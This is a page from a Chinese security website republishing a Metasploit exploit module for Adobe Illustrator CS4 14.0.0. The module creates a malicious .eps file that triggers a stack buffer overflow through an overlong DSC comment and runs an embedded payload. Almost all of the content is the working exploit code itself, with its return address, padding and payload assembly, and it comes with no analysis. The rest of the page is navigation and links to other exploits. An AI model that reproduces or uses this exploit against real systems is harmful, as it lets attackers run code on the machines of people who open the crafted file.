首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adobe Illustrator CS4 v14.0.0 eps Universal Buffer Overflow (meta)
来源:Nine:Situations:Group::pyrokinesis 作者:dookie 发布时间:2009-12-08  

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::FILEFORMAT
       
 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Adobe Illustrator CS4 v14.0.0',
   'Description'    => %q{
     Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
    overlong DSC Comment Buffer Overflow Exploit
   },
   'License'        => MSF_LICENSE,
   'Author'         => [ 'dookie, original by Nine:Situations:Group::pyrokinesis' ],
   'Version'        => '$Revision: 7724 $',
   'References'     =>
    [
     [ 'URL', 'http://www.exploit-db.com/exploits/10281' ],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'seh',
    },     
   'Payload'        =>
    {
     'Space'    => 1000,
     'BadChars' => "\x00\x0D\x0C\x0A",
     'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
    },
   'Platform' => 'win',
   'Targets'        =>
    [
     [ 'Windows Universal', { 'Ret' => 0x4B4B5173 } ], # CALL ESI in icudt36.dll
    ],
   'Privileged'     => false,
   'DisclosureDate' => 'Dec 03 2009',
   'DefaultTarget'  => 0))

   register_options(
    [
     OptString.new('FILENAME',   [ false, 'The file name.',  '9sg.eps']),
    ], self.class)

 end

 def exploit
  
  header = "\xc5\xd0\xd3\xc6\x20\x00\x00\x00\x05\xc8\x04\x00\x00\x00"
  header << "\x00\x00\x00\x00\x00\x00%\xc8\x04\x00\xb5I\x01\x00\xff"
  header << "\xff\x00\x00"
  header << "%!PS-Adobe-3.1\x20EPSF-3.0\r\n"
  header << "%ADO_DSC_Encoding:\x20Windows\x20Roman\r\n"
  header << "%"
  sploit = rand_text_alpha(41699)
  sploit << [target.ret].pack('V')
  sploit << rand_text_alpha(2291)
  sploit << "%Title:\x20Untitled-1.eps\r\n"
  sploit << "%AAAAAAAA"
  sploit << payload.encoded
  trailer = ": A\r\n"
  trailer << "%%For:\x20alias\r\n"
  trailer << "%%CreationDate:\x2011/27/2009\r\n"
  trailer += "%%BoundingBox:\x200\x200\x20227\x20171\r\n"
  trailer += "%%HiResBoundingBox:\x200\x200\x20226.5044\x20170.3165\r\n"
  trailer += "%%CropBox:\x200\x200\x20226.5044\x20170.3165\r\n"
  trailer += "%%LanguageLevel:\x202\r\n"
  trailer += "%%DocumentData:\x20Clean7Bit\r\n"
  trailer += "%ADOBeginClientInjection:\x20DocumentHeader\x20\"AI11EPS\"\r\n"
  trailer += "%%AI8_CreatorVersion:\x2014.0.0\r"
  trailer += "%AI9_PrintingDataBegin\r"
  trailer += "%ADO_BuildNumber:\x20Adobe\x20Illustrator(R)\x2014.0.0\x20x367\x20R\x20agm\x204.4890\x20ct\x205.1541\r"
  trailer += "%ADO_ContainsXMP:\x20MainFirst\r"
  trailer += "%AI7_Thumbnail:\x20128\x2096\x208\r"
  trailer += "%%BeginData:\x204096\x20Hex\x20Bytes\r"
  trailer += "%0000330000660000990000CC0033000033330033660033990033CC0033FF\r\n"
   
  eps = header + sploit + trailer

  print_status("Creating '#{datastore['FILENAME']}' file ...")

  file_create(eps)  

 end

end


 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Illustrator CS4 v14.0.0
·gAlan (.galan file) Universal
·gAlan 0.2.1 Buffer Overflow 0d
·gAlan 0.2.1 Buffer Overflow Ex
·Polipo 1.0.4 Remote Memory Cor
·又一上传突破
· Help Workshop 4.74 (hhp Proje
·Audio Workstation v6.4.2.4.0 (
·IDEAL Administration 2009 v9.7
·Audio Workstation 6.4.2.4.3 pl
·Symantec System Center Alert M
·VLC Media Player 1.0.3 smb://
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved